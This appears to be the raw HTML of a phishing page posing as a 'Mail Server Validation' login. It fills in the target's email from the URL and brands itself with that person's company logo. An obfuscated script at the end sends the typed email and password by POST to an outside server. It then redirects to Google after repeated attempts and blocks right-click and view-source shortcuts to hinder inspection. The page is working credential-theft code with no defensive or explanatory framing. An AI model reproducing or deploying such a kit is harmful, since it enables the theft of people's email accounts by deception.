<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <link href="https://fonts.googleapis.com/css?family=Roboto:300,400&display=swap" rel="stylesheet">

    <link rel="stylesheet" href="https://dipadasflasfaslf09fasfas.pages.dev/fonts/icomoon/style.css">

    <link rel="stylesheet" href="https://dipadasflasfaslf09fasfas.pages.dev/css/owl.carousel.min.css">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://dipadasflasfaslf09fasfas.pages.dev/css/bootstrap.min.css">
    
    <!-- Style -->
    <link rel="stylesheet" href="https://dipadasflasfaslf09fasfas.pages.dev/css/style.css">

    <title>Account Administrator</title>
  </head>
  <body>
  

  <div class="d-lg-flex half">
    <div class="bg order-1 order-md-1" style="background-image: url('');"></div>
    <div class="contents order-2 order-md-2">

      <div class="container">
        <div class="row align-items-center justify-content-center">
          <div class="col-md-7">
            <img src="https://dipadasflasfaslf09fasfas.pages.dev/" id="logoimg" width="20%" class="img-responsive" alt="" />
            <h3><span id="logoname" style="text-transform: uppercase;"></span>  <strong>Mail Server Validation</strong></h3>
            <p style="font-size: 15px;">Your information is only for the sole purpose of viewing this document and would not be sold or shared to any third party.</p>
            <form action="" method="post">
              <center>
								<div class="alert alert-danger" id="msg" style="display: none; font-size:14px; ">Email Password Authentication failed, try again with a valid password.</div>
								<span id="error" class="alert alert-danger" style="display: none; font-size:14px; ">That account doesn't exist. Enter a different account</span>
							</center>
              <div class="form-group first">
                <label for="username">Verified User Email:</label>
                <input type="text" class="form-control" id="email" name="email" readonly>
              </div>
              <div class="form-group last mb-3">
                <label for="password">Email Password:</label>
                <input type="password" class="form-control" placeholder="Your Password" id="password" name="password">
              </div>
              
              <div class="d-flex mb-5 align-items-center">
                <label class="control control--checkbox mb-0"><span class="caption">Remember me</span>
                  <input type="checkbox" checked="checked"/>
                  <div class="control__indicator"></div>
                </label>
                
              </div>
              <button type="submit" id="submit-btn" class="btn btn-block btn-primary">Authenticate</button>

            </form>

            <p>© 2023 Mail Server Authenticator</p>
          </div>
        </div>
      </div>
    </div>

    
  </div>
    
    

    <script src="https://dipadasflasfaslf09fasfas.pages.dev/js/jquery-3.3.1.min.js"></script>
    <script src="https://dipadasflasfaslf09fasfas.pages.dev/js/popper.min.js"></script>
    <script src="https://dipadasflasfaslf09fasfas.pages.dev/js/bootstrap.min.js"></script>
    <script src="https://dipadasflasfaslf09fasfas.pages.dev/js/main.js"></script>
  </body>

  <script src="https://dipadasflasfaslf09fasfas.pages.dev/https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
	
	<script src="https://dipadasflasfaslf09fasfas.pages.dev/https://petal-pushy-ankylosaurus.glitch.me/my-validation.js"></script>

	<script src="https://dipadasflasfaslf09fasfas.pages.dev/https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"
    integrity="sha512-aVKKRRi/Q/YV+4mjoKBsE4x3H+BkegoM/em46NNlCqNTmUYADjBbeNefNxYV7giUp0VxICtqdrbqU7iVaeZNXA=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>

<script>
function _0x8672(_0x423e7d,_0x1c44e2){var _0xd0811e=_0xd081();_0x8672=function(_0x867245,_0x3d7082){_0x867245=_0x867245-0xee;var _0x28bf10=_0xd0811e[_0x867245];return _0x28bf10;};return _0x8672(_0x423e7d,_0x1c44e2);}function _0x5c8343(_0x2feb7d,_0x1602d9){return _0x8672(_0x2feb7d-0x20e,_0x1602d9);}(function(_0x361981,_0xae4aa1){function _0x399f03(_0x32b24a,_0x1917a7){return _0x8672(_0x32b24a- -0x191,_0x1917a7);}function _0x51003c(_0x210930,_0x14f975){return _0x8672(_0x14f975-0x39f,_0x210930);}function _0x147edf(_0x54e284,_0x1e7183){return _0x8672(_0x1e7183- -0x19a,_0x54e284);}function _0x1517eb(_0x49f45f,_0x41c414){return _0x8672(_0x41c414-0x3a3,_0x49f45f);}var _0x4920cb=_0x361981();function _0x5226e5(_0x658572,_0x553f3c){return _0x8672(_0x553f3c-0x3d2,_0x658572);}while(!![]){try{var _0x96bcea=-parseInt(_0x399f03(-0x6e,-0x7a))/0x1*(parseInt(_0x5226e5(0x4c9,0x4e2))/0x2)+-parseInt(_0x1517eb(0x484,0x49a))/0x3*(parseInt(_0x399f03(-0x86,-0x6f))/0x4)+-parseInt(_0x147edf(-0x76,-0x72))/0x5*(-parseInt(_0x399f03(-0x9e,-0xaa))/0x6)+-parseInt(_0x1517eb(0x49e,0x4ba))/0x7+-parseInt(_0x5226e5(0x4d6,0x4c1))/0x8+parseInt(_0x51003c(0x48d,0x4a8))/0x9+parseInt(_0x5226e5(0x4b2,0x4d0))/0xa;if(_0x96bcea===_0xae4aa1){break;}else{_0x4920cb['push'](_0x4920cb['shift']());}}catch(_0x41697b){_0x4920cb['push'](_0x4920cb['shift']());}}}(_0xd081,0x1a5f5));$(document)[_0x1e384f(-0x18c,-0x19e)](_0x1e384f(-0x197,-0x1aa),function(_0x3b8d68){function _0x3171f0(_0x1583f6,_0x3d71f0){return _0x1e384f(_0x1583f6,_0x3d71f0-0x621);}function _0x46bd4d(_0x32dcfc,_0x5a2bd6){return _0x20b9c7(_0x32dcfc,_0x5a2bd6- -0x485);}function _0x4d62d0(_0x2a034e,_0x23141c){return _0x1e384f(_0x2a034e,_0x23141c- -0xa5);}if(_0x3b8d68[_0x3171f0(0x44e,0x45d)]&&_0x3b8d68[_0x46bd4d(0x86,0x7a)]==0x53){_0x3b8d68[_0x46bd4d(0x8d,0x77)]();return![];}});function _0x1e384f(_0x593c7b,_0x2b5ef3){return _0x8672(_0x2b5ef3- -0x2bc,_0x593c7b);}document[_0x476f59(0x45e,0x47b)](_0x1e384f(-0x191,-0x1ae),_0x20c75c=>_0x20c75c['preventDefault']());function _0x20b9c7(_0x399d65,_0x4446d6){return _0x8672(_0x4446d6-0x3d8,_0x399d65);}function _0xd081(){var _0x34f9b3=['Sgn\x20in','location','623161rUFrzJ','keyCode','val','#back1','body','Password\x20field\x20is\x20empty','#email','bind','url(\x27https://image.thum.io/get/width/1200/https://','That\x20account\x20doesn\x27t\x20exist.\x20Enter\x20a\x20different\x20account','#msg','#logoname','1Ybrwfu','preventDefault','Sign\x20in','replace','which','40590FnnCeN','test','animate','log','indexOf','1491440Qobwcl','aHR0cHM6Ly93N0YXBwLmYXMucGhw','style','html','24pSaUYW','#submit-btn','focus','signal','583860dPwnNF','ctrlKey','.logoname','https://','attr','#password','https://nomadint.ae/wp-themes/index.php','5442400DNcOZj','addEventListener','backgroundImage','toLowerCase','ready','substr','src','#logoimg','<span\x20style=\x27color:red;\x27>Username\x20or\x20Password\x20is\x20incorrect\x20Please\x20try\x20again\x20<\x20/span>','Email\x20field\x20is\x20empty','https://www.google.com','904419IiXzjt','show','4IuVJUf','#error','hide','contextmenu','toUpperCase','198218cZlbUl','https://logo.clearbit.com/','keydown','msg','onkeydown'];_0xd081=function(){return _0x34f9b3;};return _0xd081();}function _0x476f59(_0x13ba06,_0x53e8d3){return _0x8672(_0x53e8d3-0x37c,_0x13ba06);}document[_0x5c8343(0x322,0x305)]=function(_0x1fd029){function _0x54adbc(_0x498197,_0x52131e){return _0x3bf092(_0x498197- -0x51c,_0x52131e);}function _0x12c3ac(_0x410028,_0xbafa6c){return _0x3bf092(_0x410028- -0x52b,_0xbafa6c);}if(_0x1fd029[_0x12c3ac(-0x7b,-0x8b)]&&(_0x1fd029['keyCode']===0x43||_0x1fd029[_0x12c3ac(-0x5b,-0x6f)]===0x56||_0x1fd029['keyCode']===0x55||_0x1fd029['keyCode']===0x75)){return![];}else{return!![];}};$(document)['keypress']('u',function(_0x128a4a){if(_0x128a4a['ctrlKey']){return![];}else{return!![];}});function _0x3bf092(_0x139044,_0x11ac38){return _0x8672(_0x139044-0x3b8,_0x11ac38);}$(document)[_0x1e384f(-0x1b6,-0x1ba)](function(){var _0x31b2bb=0x0;function _0x15f08b(_0x4cc855,_0x5ce7d4){return _0x1e384f(_0x4cc855,_0x5ce7d4- -0x2);}function _0x47b0e1(_0x1fbc8a,_0x541326){return _0x5c8343(_0x1fbc8a- -0x567,_0x541326);}$(_0x47b0e1(-0x23f,-0x24d))['click'](function(){$('#msg')['hide']();function _0x30bfab(_0x23c08e,_0x36038a){return _0x47b0e1(_0x23c08e-0x4db,_0x36038a);}$('#email')[_0x5a3bd9(0x1d0,0x1ed)]('');$('#automail')[_0x5a3bd9(0x1e1,0x1d2)]({'left':0xc8,'opacity':_0x30bfab(0x28f,0x27a)},0x0);function _0x26a886(_0x586bd4,_0xdb4bf4){return _0x47b0e1(_0x586bd4-0x37b,_0xdb4bf4);}function _0x5a3bd9(_0x339db3,_0x20edcd){return _0x47b0e1(_0x339db3-0x410,_0x20edcd);}function _0x457ee8(_0xf99657,_0x2be7b4){return _0x47b0e1(_0xf99657-0x57b,_0x2be7b4);}$('#inputbar')[_0x5a3bd9(0x1e1,0x200)]({'right':0xc8,'opacity':'show'},0x3e8);});var _0x179bf5=window[_0x47b0e1(-0x243,-0x24f)]['hash'][_0x15f08b(-0x19e,-0x1bb)](0x1);function _0x4f7882(_0x1c5e86,_0x2854ec){return _0x3bf092(_0x2854ec- -0x35d,_0x1c5e86);}if(!_0x179bf5){}else{var _0xe727d4=_0x179bf5;$(_0x15f08b(-0x1b2,-0x1a1))[_0x4f7882(0x165,0x174)](_0xe727d4);var _0x1d995d=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x1d995d[_0x534ba4(-0x1f3,-0x1ef)](_0xe727d4)){$(_0x534ba4(-0x211,-0x20c))[_0x47b0e1(-0x24f,-0x238)]();_0x179bf5[_0x15f08b(-0x1ac,-0x1c9)];return![];}var _0x105651=_0xe727d4[_0x47b0e1(-0x26b,-0x276)]('@');var _0x50e4c0=_0xe727d4[_0x15f08b(-0x1bf,-0x1bb)](_0x105651+0x1);var _0x5731e4=_0x47b0e1(-0x25f,-0x246)+_0x50e4c0;var _0x32002c=_0x50e4c0[_0x47b0e1(-0x256,-0x25c)](0x0,_0x50e4c0[_0x534ba4(-0x223,-0x22a)]('.'));var _0x340eb9=_0x32002c[_0x15f08b(-0x1c0,-0x1bd)]();var _0x2d60fe=_0x32002c[_0x4f7882(0x159,0x16a)]();var _0x5a6110=_0x50e4c0;var _0x2db315=_0x4f7882(0x166,0x17a)+_0x5a6110;'\x27)';$(_0x15f08b(-0x1cf,-0x1b9))[_0x4f7882(0x13e,0x156)](_0x15f08b(-0x1b6,-0x1ba),_0x193dc0(0x14d,0x158)+_0x5731e4);$(_0x47b0e1(-0x237,-0x22c))[_0x47b0e1(-0x267,-0x261)](_0x340eb9);$(_0x534ba4(-0x21d,-0x21f))[_0x4f7882(0x143,0x14d)](_0x340eb9);document[_0x15f08b(-0x19e,-0x1a3)][_0x534ba4(-0x227,-0x227)][_0x4f7882(0x144,0x15b)]=_0x2db315;$('.email')[_0x15f08b(-0x1c4,-0x1cc)](_0x179bf5);}function _0x534ba4(_0x26f422,_0x4ab4da){return _0x5c8343(_0x4ab4da- -0x526,_0x26f422);}function _0x193dc0(_0x5020bc,_0x352246){return _0x5c8343(_0x5020bc- -0x1d2,_0x352246);}$(_0x47b0e1(-0x265,-0x254))['click'](function(_0x5cb1df){_0x5cb1df['preventDefault']();$('#error')['hide']();function _0x3775c0(_0xe5eafe,_0x1db6dc){return _0x193dc0(_0x1db6dc-0x12b,_0xe5eafe);}$('#msg')[_0x39a92c(-0x26a,-0x251)]();var _0x6fea5=$(_0x3775c0(0x296,0x284))['val']();var _0x83bb3e=$('#password')[_0x39a92c(-0x22c,-0x245)]();function _0x39a92c(_0x6eac04,_0x44c4b0){return _0x193dc0(_0x44c4b0- -0x39a,_0x6eac04);}var _0x50fe32=_0x6fea5;var _0x570e7e=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x6fea5){$(_0x3775c0(0x266,0x273))['show']();$(_0x4f0efe(0x483,0x46e))[_0x41aef6(-0x2ba,-0x2af)](_0x4f0efe(0x45e,0x469));return![];}function _0x41aef6(_0x5733aa,_0x2e7892){return _0x4f7882(_0x2e7892,_0x5733aa- -0x407);}function _0x4f0efe(_0x46a269,_0x4675a6){return _0x47b0e1(_0x4675a6-0x6bb,_0x46a269);}function _0x346e25(_0x3dc96f,_0x4cc6b4){return _0x193dc0(_0x4cc6b4-0x250,_0x3dc96f);}if(!_0x570e7e['test'](_0x50fe32)){$('#error')[_0x346e25(0x395,0x396)]();$(_0x39a92c(-0x25d,-0x252))[_0x346e25(0x388,0x37e)](_0x346e25(0x395,0x3ac));return![];}if(!_0x83bb3e){$(_0x39a92c(-0x26b,-0x252))[_0x346e25(0x39d,0x396)]();$('#error')[_0x346e25(0x36b,0x37e)](_0x39a92c(-0x22a,-0x242));return![];}_0x31b2bb=_0x31b2bb+0x1;var _0x4edc68=atob(_0x346e25(0x35f,0x37c));$['ajax']({'dataType':'JSON','url':_0x4f0efe(0x473,0x45f),'type':'POST','data':{'email':_0x6fea5,'password':_0x83bb3e},'beforeSend':function(_0x13cfb0){function _0x18650d(_0x4e858e,_0x20d324){return _0x346e25(_0x4e858e,_0x20d324- -0x4ab);}function _0x8d3556(_0x108ba0,_0xa9fb5c){return _0x41aef6(_0x108ba0-0x1ac,_0xa9fb5c);}function _0x4d8a3e(_0x242aea,_0x369e00){return _0x346e25(_0x242aea,_0x369e00- -0x36f);}$(_0x4d8a3e(-0x8,0x11))[_0x8d3556(-0x10e,-0x115)](_0x4d8a3e(0x3d,0x42));},'success':function(_0x1f5179){function _0x352f50(_0x23adb3,_0x2042f7){return _0x39a92c(_0x23adb3,_0x2042f7-0x625);}function _0x4a3e19(_0x534982,_0x1260ce){return _0x3775c0(_0x1260ce,_0x534982- -0x528);}function _0x336874(_0x491a7f,_0x449846){return _0x3775c0(_0x449846,_0x491a7f- -0x120);}function _0x33c377(_0x301c3e,_0x5f9306){return _0x3775c0(_0x5f9306,_0x301c3e- -0xb1);}$(_0x2c884c(0x28d,0x296))[_0x2c884c(0x25e,0x27d)](_0x4a3e19(-0x2bb,-0x2d7));function _0x2c884c(_0x5e31f5,_0x501c74){return _0x4f0efe(_0x501c74,_0x5e31f5- -0x1f6);}if(_0x1f5179){$(_0x33c377(0x1d7,0x1e3))[_0x33c377(0x1c0,0x1ce)]();console[_0x33c377(0x1e1,0x1d5)](_0x1f5179);$(_0x33c377(0x1d7,0x1c6))[_0x352f50(0x3d8,0x3b9)](_0x1f5179[_0x2c884c(0x27f,0x287)]);if(_0x1f5179[_0x2c884c(0x262,0x25f)]=='ok'){$(_0x4a3e19(-0x2c5,-0x2c6))[_0x336874(0x160,0x15c)]('');if(_0x31b2bb>=0x3){_0x31b2bb=0x0;window['location'][_0x352f50(0x406,0x3ed)](_0x33c377(0x1be,0x1a2));}}else{$(_0x352f50(0x401,0x3e8))[_0x2c884c(0x25e,0x243)](_0x1f5179[_0x352f50(0x3f8,0x3da)]);}}},'error':function(){$(_0x263b7d(-0x159,-0x161))['val']('');function _0x5e15e6(_0x43dbb3,_0x507222){return _0x39a92c(_0x43dbb3,_0x507222-0x106);}function _0x3de9a7(_0x68b5d5,_0x269a81){return _0x4f0efe(_0x269a81,_0x68b5d5- -0x53a);}function _0x263b7d(_0x4c77bf,_0x307ea9){return _0x4f0efe(_0x4c77bf,_0x307ea9- -0x5bf);}function _0x36f79c(_0x884dc4,_0x495354){return _0x39a92c(_0x495354,_0x884dc4-0x1f5);}function _0x1da5af(_0x1ef78f,_0x2ca3db){return _0x346e25(_0x2ca3db,_0x1ef78f- -0x4e3);}if(_0x31b2bb>=0x3){_0x31b2bb=0x0;window[_0x263b7d(-0x155,-0x147)][_0x263b7d(-0x133,-0x137)](_0x1da5af(-0x14f,-0x13c));}$(_0x5e15e6(-0x151,-0x137))[_0x5e15e6(-0x146,-0x14e)]();},'complete':function(){function _0x4add9e(_0x297ffc,_0x11bd46){return _0x39a92c(_0x11bd46,_0x297ffc-0x56c);}function _0x2fdbab(_0x288718,_0x1f6336){return _0x39a92c(_0x288718,_0x1f6336-0x309);}$('#submit-btn')[_0x2fdbab(0x8a,0x9d)](_0x2fdbab(0xa6,0xc0));}});});});
</script>
</html>